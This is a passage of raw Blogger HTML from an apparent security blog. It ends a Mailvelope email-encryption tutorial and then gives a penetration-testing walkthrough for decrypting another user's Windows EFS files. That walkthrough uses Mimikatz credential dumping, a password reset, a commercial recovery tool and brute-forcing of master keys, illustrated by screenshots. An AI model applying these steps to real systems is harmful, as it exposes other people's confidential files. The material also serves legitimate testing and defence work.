<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
4. Now You can compose a message and encrypt it with your friends public key<br />
You just need to put your sender whose public key you have imported in previous step.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6sVzZ5LQ7xgWkx_dOFcrdaRjwVa6dIBYFr7V02M1wi3qn_NnkfUvwmS43bRIggDpgFgxk0k2PlRrjor1oSYcQ9ofTJE2t0Gu7ebGcVYMFgOY_Nu55P-4tdMwFn0kIFeQ7DzaUOZbJ0Gnr/s1600/4.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="123" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6sVzZ5LQ7xgWkx_dOFcrdaRjwVa6dIBYFr7V02M1wi3qn_NnkfUvwmS43bRIggDpgFgxk0k2PlRrjor1oSYcQ9ofTJE2t0Gu7ebGcVYMFgOY_Nu55P-4tdMwFn0kIFeQ7DzaUOZbJ0Gnr/s400/4.PNG" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
5. Even if other person intercepts this message he will see below contents<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-TSnAhm9DiaNKBqKQDHo0WIbTaHZl3fbTK4ScRK8CD4aFy4GFoPEGfAI0_lKVwN5aCRXucMoHfPrAtbH0L5DErANewYVDiyJ5uOdwq7eru3Nc6u-tFDBoJ9M9HdalJDyhYY2wv39HgieC/s1600/6.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-TSnAhm9DiaNKBqKQDHo0WIbTaHZl3fbTK4ScRK8CD4aFy4GFoPEGfAI0_lKVwN5aCRXucMoHfPrAtbH0L5DErANewYVDiyJ5uOdwq7eru3Nc6u-tFDBoJ9M9HdalJDyhYY2wv39HgieC/s400/6.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
6. Now when your friend will open the message he will see below Mailvelope option for decrypting this message</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
Your friend will enter passphrase for his private key</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3Ern2aM_Nr8GmS7OuR9LxDJTZb0YZOX5x1YyYGHz9VjuJJoCefGgrk2Zzx8JgYkTdZsGYXzfHjdwLmhqDgZo5xTZbP0yxvbaD_MeLO3ymiIO64lzMGGQxqQc40yWMcZ18fvnYQuoih7XP/s1600/8.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3Ern2aM_Nr8GmS7OuR9LxDJTZb0YZOX5x1YyYGHz9VjuJJoCefGgrk2Zzx8JgYkTdZsGYXzfHjdwLmhqDgZo5xTZbP0yxvbaD_MeLO3ymiIO64lzMGGQxqQc40yWMcZ18fvnYQuoih7XP/s400/8.PNG" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
7. Thats it! Your friend has decrypted your message with his private key.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfCxAgvOZQdqsu9djTrpbhPDaCutsk_3wdVY5MK8yVFpv5p0k3-sWE1tSuaKdTLs5Pkr4OjlbMnjnYfM1AdAt0vMk8RU-giKG4FS_iHMe9C_AnA2BEE3HsO3NkKC_UITW2_XI3f7rRmRhk/s1600/9.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="206" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfCxAgvOZQdqsu9djTrpbhPDaCutsk_3wdVY5MK8yVFpv5p0k3-sWE1tSuaKdTLs5Pkr4OjlbMnjnYfM1AdAt0vMk8RU-giKG4FS_iHMe9C_AnA2BEE3HsO3NkKC_UITW2_XI3f7rRmRhk/s400/9.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />
Hope this helps!<br />
<br />
<br />
<div>
<br /></div>
</div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com0tag:blogger.com,1999:blog-6767655042968972948.post-59097885309925713802017-01-17T10:28:00.000-08:002017-01-17T12:22:15.171-08:00Decrypting EFS encrypted Files<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Recently came across scenario on decryption of EFS ( Encrypted File System) encrypted files. Encrypted File System (EFS) is a Microsoft Windows feature for encrypting files nad folders on NTFS drives.<br />
<br />
<b>How to encrypt a file ?</b><br />
Its simple, just follow below steps,<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1-oC53t1HweyX7v3i3iPAaQ4ZwAQEZRERTfeI_x-ypNeiyt7d_48hyphenhyphen1TqHtCX2V8QOJXCPscauhaYj4Pms0mljNEw9eaBuGRF603s0RYFDSs2oNGNn48QIM5xCIJ-zC40Jix9guPg96bb/s1600/e1.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="203" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1-oC53t1HweyX7v3i3iPAaQ4ZwAQEZRERTfeI_x-ypNeiyt7d_48hyphenhyphen1TqHtCX2V8QOJXCPscauhaYj4Pms0mljNEw9eaBuGRF603s0RYFDSs2oNGNn48QIM5xCIJ-zC40Jix9guPg96bb/s400/e1.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Encrypting folder name 'Encrypt' with user 'Administrator'<br />
<br />
<br /></td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjm1WYB11vaV-KQ51t-BDSGtOVkuOYipaCiNKXjvQQrJZHBypdZfDx9EvSowQnVsZrrEAdAVxTgp5OjnZ_BS2VL7lXZTEuUCTSzfpxe1EjnkZflAORJTQd9vhZcjoNiv2juTr4NLQ1gLt6/s1600/e2.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="153" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjm1WYB11vaV-KQ51t-BDSGtOVkuOYipaCiNKXjvQQrJZHBypdZfDx9EvSowQnVsZrrEAdAVxTgp5OjnZ_BS2VL7lXZTEuUCTSzfpxe1EjnkZflAORJTQd9vhZcjoNiv2juTr4NLQ1gLt6/s400/e2.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Attempt to access file with user 'admin'</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Now its clear, that only user who encrypted the file can decrypt it!..<br />
<br />
In your penetration testing, you must get an administrator level access the system for decryption of EFS files.<br />
<br />
<br />
Possible Ways,<br />
<br />
<b><u>Step 1 </u></b>: Using '<b>Cipher</b>' command in Windows, you can encrypt / decrypt files, view encrypted file information and use it further for your attacks, I have executed below command with user 'admin' which is administrator account on the system and found that files are encrypted by user named 'Administrator' - That's what important to us!<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXyOjofKB7zx70qBxg-E0jT6KbnCpLmfOpek8TajWIBEvGLXanZ9iGYrv3-OaNURO6_uMEkR1o_4CbINgnhZNkFTJUIU2oiP7eeLiA8VcYVflc2NbNXlzQ2pWLkHizDL9IXaD19Odr59iS/s1600/e5+decrypted+only+by+administrator.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="197" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXyOjofKB7zx70qBxg-E0jT6KbnCpLmfOpek8TajWIBEvGLXanZ9iGYrv3-OaNURO6_uMEkR1o_4CbINgnhZNkFTJUIU2oiP7eeLiA8VcYVflc2NbNXlzQ2pWLkHizDL9IXaD19Odr59iS/s400/e5+decrypted+only+by+administrator.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Using Cipher command to know information about encrypted file</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<b><u>Case 1 : </u></b> Once you have administrator level access to the system, I would suggest,<br />
1. Extract system passwords from memory with Mimikatz, and get the password for account '<b>Administrator</b>' ( Password for user which encrypted the file) ,<br />
2. Authenticate over SMB and access EFS encrypted files just like normal files . - <b>This is of course simple trick.</b><br />
<br />
<br />
<b><u>Case 2 : </u></b>I also tried changing 'administrator' password from account 'admin' and it works, you can just login with your new password and still be able to access EFS encrypted files - <b>So no dependencies even if password is changed.</b><br />
<b><br /></b>
<u><b>Case 3:</b></u><b> </b>What if because of some reason, you are not able to extract windows password from system memory, or what if system access is configured via SmartCard, you may not find domain passwords/local administrator passwords in system memory.<br />
<br />
In this case 3, it becomes a challenge, because you dont have valid password for the account '<b>Administrator</b>' and hence it wont be possible to access EFS encrypted files directly even via other administrator user name '<b>admin</b>'<br />
<br />
<br />
Now in this case, there are two approaches,<br />
<br />
1. Using 'admin' credentials attempt to execute Mimikatz::Crypto commands mentioned below<br />
- https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files<br />
( This is quite complex process but yes you can definitely follow the steps and attempt to recover your keys )<br />
<br />
2. Using 'admin' credentials - Install a tool "Advanced EFS Data Recovery Tool" - Its commercial (https://www.elcomsoft.com/aefsdr.html)<br />
<br />
Using this tool, you will be able to identify EFS encrypted files throughout disk, and find following two important keys :<br />
- Private Key<br />
- Master Key<br />
<br />
<br />
Private key is encrypted with Master key.<br />
In order to decrypt this Master key we need to conduct bruteforce attack.<br />
Usually password is -<br />
- User account password<br />
- Same key as a password<br />
<br />
<br />
<br />
Here are some of the POC which I simulated in my test environment.<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0-xNRL8gL_kdhd3Bdwiby3EX73_t_gI69QVhtHu3NN9bSXQ6jG4L7iQzbLAr6uaEspbedH7omQSQsh3FOvAdcMuYbTpd6urgSjhFCeb65G0b_LM0PJCm73m8LIunjgZMn3h2eZwv3Delu/s1600/0_malicioususer+doest+have+right+to+access+confidential+file+encrypted+by+administrator.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="183" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0-xNRL8gL_kdhd3Bdwiby3EX73_t_gI69QVhtHu3NN9bSXQ6jG4L7iQzbLAr6uaEspbedH7omQSQsh3FOvAdcMuYbTpd6urgSjhFCeb65G0b_LM0PJCm73m8LIunjgZMn3h2eZwv3Delu/s400/0_malicioususer+doest+have+right+to+access+confidential+file+encrypted+by+administrator.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">"Maliciousadmin" user doesnt have access to encrypted file - Create by Other user</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjspamQhMrEYGdZfpXl9hG_GQypzRD56bxwQm2S5dVrqIoyPxVSob6xvXvOnkIW5zki8_aWOwDxVj8FeOUYUeKhYbsjvsCRcmh_Z4xSPAVMv4rNHcMLDd-tdpHBU-7-RAkzNuxkGQKX7Xv-/s1600/1_maliciousadmin_installed_EFS+recovery+tool.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="151" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjspamQhMrEYGdZfpXl9hG_GQypzRD56bxwQm2S5dVrqIoyPxVSob6xvXvOnkIW5zki8_aWOwDxVj8FeOUYUeKhYbsjvsCRcmh_Z4xSPAVMv4rNHcMLDd-tdpHBU-7-RAkzNuxkGQKX7Xv-/s400/1_maliciousadmin_installed_EFS+recovery+tool.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">"Malicousadmin" installs EFS recovers</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWIaUwkqdvx40-U8oy0T63oeR3GPYD-nkpeiqgqnEMslGl7tPKKbLNOzQJGJm5-haLB2w_uPoNpd-2nWP-EXuDNUP9KyNYW5BhZ2xP7BuFZfp6bAeRpC0gFzVGVCM1NFHLe710L45oWU7D/s1600/2_attacker+dont+know+if+certificate+is+exported+or+not+-+lets+search+the+disk.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWIaUwkqdvx40-U8oy0T63oeR3GPYD-nkpeiqgqnEMslGl7tPKKbLNOzQJGJm5-haLB2w_uPoNpd-2nWP-EXuDNUP9KyNYW5BhZ2xP7BuFZfp6bAeRpC0gFzVGVCM1NFHLe710L45oWU7D/s400/2_attacker+dont+know+if+certificate+is+exported+or+not+-+lets+search+the+disk.PNG" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpJDMmvHecgyYAeicM623uFilOqX9CZUV-_8aJ0BR4AeKPeOL7HdIZMBA2Vt83rHduWqwTP4gRE1uYDMg_ple_GvZIqoqR-loBgyFJcBOSt-kzTb8M16Mh4ryvExPuV4kDNsOxX1oxCkXM/s1600/3_attacker_got_list+of+keys+-+private+and+master.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpJDMmvHecgyYAeicM623uFilOqX9CZUV-_8aJ0BR4AeKPeOL7HdIZMBA2Vt83rHduWqwTP4gRE1uYDMg_ple_GvZIqoqR-loBgyFJcBOSt-kzTb8M16Mh4ryvExPuV4kDNsOxX1oxCkXM/s400/3_attacker_got_list+of+keys+-+private+and+master.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Scanning for Private/Master keys and Encrypted files</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAQhVR81fp0LT8gwY7pzdGgf6s7wz62l6q_Mtyk_l4a_LXNdS63cERYwzay38R033J75uaTH3mjSk4DqH0XXcO9yv6LAAMo8grqzwr-dGSlDSU7tk59EhoXbek2urRoeHFx1__oun6fbyT/s1600/4_attacker+has+dictionary+for+bruteforce+attack+on+keys.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="147" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAQhVR81fp0LT8gwY7pzdGgf6s7wz62l6q_Mtyk_l4a_LXNdS63cERYwzay38R033J75uaTH3mjSk4DqH0XXcO9yv6LAAMo8grqzwr-dGSlDSU7tk59EhoXbek2urRoeHFx1__oun6fbyT/s400/4_attacker+has+dictionary+for+bruteforce+attack+on+keys.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Launching Bruteforce attack against Master key</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKoFpQms34Kh8n1TSchlLRIaZnBkSO6a-BDjjOZyR_KLPW_LE7FkHYtRRL5Q5U94ezHPBUQgDyF9ladw_OFt1Gwz6titjiCjkx8fjlv2R1IGwaWcQLOL3D156X4DHMdazNMK9aBbQFGzeD/s1600/5_attacker+selected+dictionary+attack+file.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKoFpQms34Kh8n1TSchlLRIaZnBkSO6a-BDjjOZyR_KLPW_LE7FkHYtRRL5Q5U94ezHPBUQgDyF9ladw_OFt1Gwz6titjiCjkx8fjlv2R1IGwaWcQLOL3D156X4DHMdazNMK9aBbQFGzeD/s400/5_attacker+selected+dictionary+attack+file.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Launching Bruteforce attack</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHpXYCMhg1QKPNK0g12W9FP3FxlSv56_XQZIktgDHDchJmKUl5gKYjebVEcZwYIkgO5loK2yW05dJX9J1rOh5SdFomI60MaL6J2pyoTj4fuEVPkvLmJ-TT2BsJ-oS5n6y586L2UJI0VHcq/s1600/6_key+decryption+in+process.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHpXYCMhg1QKPNK0g12W9FP3FxlSv56_XQZIktgDHDchJmKUl5gKYjebVEcZwYIkgO5loK2yW05dJX9J1rOh5SdFomI60MaL6J2pyoTj4fuEVPkvLmJ-TT2BsJ-oS5n6y586L2UJI0VHcq/s400/6_key+decryption+in+process.PNG" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGYs5QD6M9x_VUjJbEs9nqufZDtquKvIDx9XYR6MEWWcXLQC-BGOfsNTc17TOXAfCeFb4MlQtzZ3Z09lZO1eRfeYPog8ujDoHAL53zagIq79ZvLIgWiqSnlmAH1ZrPiA5zEco9-NVf-XOv/s1600/7_keys+decrypted.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGYs5QD6M9x_VUjJbEs9nqufZDtquKvIDx9XYR6MEWWcXLQC-BGOfsNTc17TOXAfCeFb4MlQtzZ3Z09lZO1eRfeYPog8ujDoHAL53zagIq79ZvLIgWiqSnlmAH1ZrPiA5zEco9-NVf-XOv/s400/7_keys+decrypted.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Decrypted Keys - Now can be used for decrypting files</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii9XpDxtkHglqJWqOFXRAYS9pt6jAJsNgClOuZsEEQU_ydrA6gpbN9bHckSEtpsMx8UOBMuoNQ_0IGllpjCZaq9Ngy1CfNaj2F51evCrO5AAE3Tm6YakTaarrln94AJIQSTW3C690yW3BM/s1600/8_scan+for+encrypted+file+in+disk.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii9XpDxtkHglqJWqOFXRAYS9pt6jAJsNgClOuZsEEQU_ydrA6gpbN9bHckSEtpsMx8UOBMuoNQ_0IGllpjCZaq9Ngy1CfNaj2F51evCrO5AAE3Tm6YakTaarrln94AJIQSTW3C690yW3BM/s400/8_scan+for+encrypted+file+in+disk.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><br /></td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div>
<br /></div>
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz1iTrHJvP-i1f0tw7fLrlYzXYYQrTDXUI1E9BTW-ofVE2ieALKQajuvTZ3_YRWAAX61Dr_rzqSOwzxvN1098y_NH2Dmj9PBGBrHOpjI4XVgOZFhQGiV4iE8BSLXYSnD30pqXQaZzUAtu6/s1600/final.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz1iTrHJvP-i1f0tw7fLrlYzXYYQrTDXUI1E9BTW-ofVE2ieALKQajuvTZ3_YRWAAX61Dr_rzqSOwzxvN1098y_NH2Dmj9PBGBrHOpjI4XVgOZFhQGiV4iE8BSLXYSnD30pqXQaZzUAtu6/s400/final.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Files Decrypted with "malicioususer" </td></tr>
</tbody></table>
<br />
<br />
<br />
Hope this was helpful!<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<u>Decry pt the EFS encrypted file a bit hard way :</u><br />
<br />
<u>Step 1:</u> Login with userid "malicioususer" -<br />
<br />
<u>Step 2:</u> In our scenario we need to extract keys for user "admin" who has encrypted the confidential file.<br />
For this, we need to navigate to<br />
<br />
"C:\Users\Gentil Kiwi\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\<file name><br />
<br />
<u>Step 3:</u> Running crypto:system on above file path results in generation of Public Key in a filename with extension .der<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKtS8wsWtH8xGtd1oAGaN1aQxZNAQioJDwDqSO4LPiw2Q4PhPSWyUUMkYwBDc1Gt7DdVrejONB2CQxuP7xOPijzywNbZrPHn68F1wHTb9BdoNDUzABLIK4kw84Dmb6x6j790c9tG6YFaza/s1600/1_access+EFS+certificate+file+location+from+malicioususer.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="197" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKtS8wsWtH8xGtd1oAGaN1aQxZNAQioJDwDqSO4LPiw2Q4PhPSWyUUMkYwBDc1Gt7DdVrejONB2CQxuP7xOPijzywNbZrPHn68F1wHTb9BdoNDUzABLIK4kw84Dmb6x6j790c9tG6YFaza/s400/1_access+EFS+certificate+file+location+from+malicioususer.PNG" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<b><u>Step 4:</u></b><br />
<b><u><br /></u></b>
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFQRRihb2Vn-4H4cga8omMJJObKZVj5rvtunFGtaunBFyJNNeGSaqgUDpXXHIP6tag_Fm2fOiyhK192ZHyRNsdb2vrOk7FTp_xURAuBXUmJ70prcRiuvYHOBgDEhTuIwi3PypkZMz0STU_/s1600/1_access+EFS+certificate+file+location+from+malicioususer.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="197" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFQRRihb2Vn-4H4cga8omMJJObKZVj5rvtunFGtaunBFyJNNeGSaqgUDpXXHIP6tag_Fm2fOiyhK192ZHyRNsdb2vrOk7FTp_xURAuBXUmJ70prcRiuvYHOBgDEhTuIwi3PypkZMz0STU_/s400/1_access+EFS+certificate+file+location+from+malicioususer.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Encrypted Private Key</td></tr>
</tbody></table>
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD3by984XigD7uuqjFn894XcAdXR5TIbnScPa8S8Af-qM8zltHaFj7CEgbWNELlBwPFYPaA417LXfDyDjSEBRcFBYL9CFrbyv1vrFiKylPyBtg_ZGDJ78uM0U7iPkpPxybStaVYSjMezSA/s1600/2_confirming+if+private+key+is+correct.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="196" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD3by984XigD7uuqjFn894XcAdXR5TIbnScPa8S8Af-qM8zltHaFj7CEgbWNELlBwPFYPaA417LXfDyDjSEBRcFBYL9CFrbyv1vrFiKylPyBtg_ZGDJ78uM0U7iPkpPxybStaVYSjMezSA/s400/2_confirming+if+private+key+is+correct.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Confirming the private key </td></tr>
</tbody></table>
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNLx1C3WhilMIyRaOfYh-qip1LfzsZDjhpRKAcVGvZb9CXSkJd2WJZoTBdIptdSzNyfwluWp6dZv8qB6KcuY22GGetmAX05PTAirf1Kj-i9nLCgmhbRgbWmKgzV3NWORLBowx7m6HLvdiN/s1600/3_Extracting_private+and+master+keys.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNLx1C3WhilMIyRaOfYh-qip1LfzsZDjhpRKAcVGvZb9CXSkJd2WJZoTBdIptdSzNyfwluWp6dZv8qB6KcuY22GGetmAX05PTAirf1Kj-i9nLCgmhbRgbWmKgzV3NWORLBowx7m6HLvdiN/s400/3_Extracting_private+and+master+keys.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Extracting Master Key</td></tr>
</tbody></table>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
